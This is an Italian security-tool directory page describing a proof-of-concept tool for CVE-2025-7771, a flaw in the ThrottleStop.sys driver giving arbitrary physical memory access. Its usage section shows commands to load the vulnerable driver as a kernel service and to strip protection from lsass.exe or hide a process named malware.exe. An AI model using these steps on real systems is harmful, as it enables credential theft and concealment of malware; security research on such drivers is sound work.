Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-7771 — Una semplice PoC che dimostra la vulnerabilità nel driver ThrottleStop.sys, mostrando capacità di lettura e scrittura arbitraria della memoria fisica, nonché la traduzione degli indirizzi da virtuale a fisico utilizzando Superfetch. | Kitploit
Strumenti/GitHubGitHub/xm0kht4r/cve-2025-7771
Escalation di PrivilegiAnalisi delle VulnerabilitàPost-ExploitAnalisi MalwareRed TeamingBinary Exploitation
GitHubxm0kht4r/cve-2025-7771

CVE-2025-7771

Una semplice PoC che dimostra la vulnerabilità nel driver ThrottleStop.sys, mostrando capacità di lettura e scrittura arbitraria della memoria fisica, nonché la traduzione degli indirizzi da virtuale a fisico utilizzando Superfetch.

Vedi Repository
10137 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-7771

Un semplice PoC che dimostra la vulnerabilità nel driver ThrottleStop.sys, mostrando capacità arbitrarie di lettura e scrittura della memoria fisica, nonché la traduzione degli indirizzi virtuali in fisici tramite Superfetch.

⚡ Utilizzo:

1. Registra un servizio:

Avvia cmd.exe con privilegi di amministratore e registra un servizio driver kernel con tipo "kernel" e binPath che punta alla posizione del driver vulnerabile.

root@kitploit:~
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop

Comandi:

root@kitploit:~
  --protect   : Protect a process.
  --unprotect : Unprotect a potected process.
  --hide      : Hide a process.
  --unhide    : Unhide a process.
  --help      : Print help

Esempi:

CVE-2025-7771.exe --protect notepad.exe o CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe o CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe o CVE-2025-7771.exe --hide 12345

Per riattivare un processo nascosto, puoi usare il comando --unhide specificando l'indirizzo eprocess del processo nascosto con '--eprocess': CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240

🔒 DISCLAIMER

Sei responsabile di assicurarti di avere l'autorizzazione appropriata prima di utilizzare questo strumento. L'autore non si assume alcuna responsabilità per un uso improprio.

🤝 Collaborations

Questo è un progetto in corso, contributi e suggerimenti sono benvenuti! Se hai idee, miglioramenti o desideri collaborare, non esitare a contattarmi all'indirizzo: [email protected]

Scarica lo strumento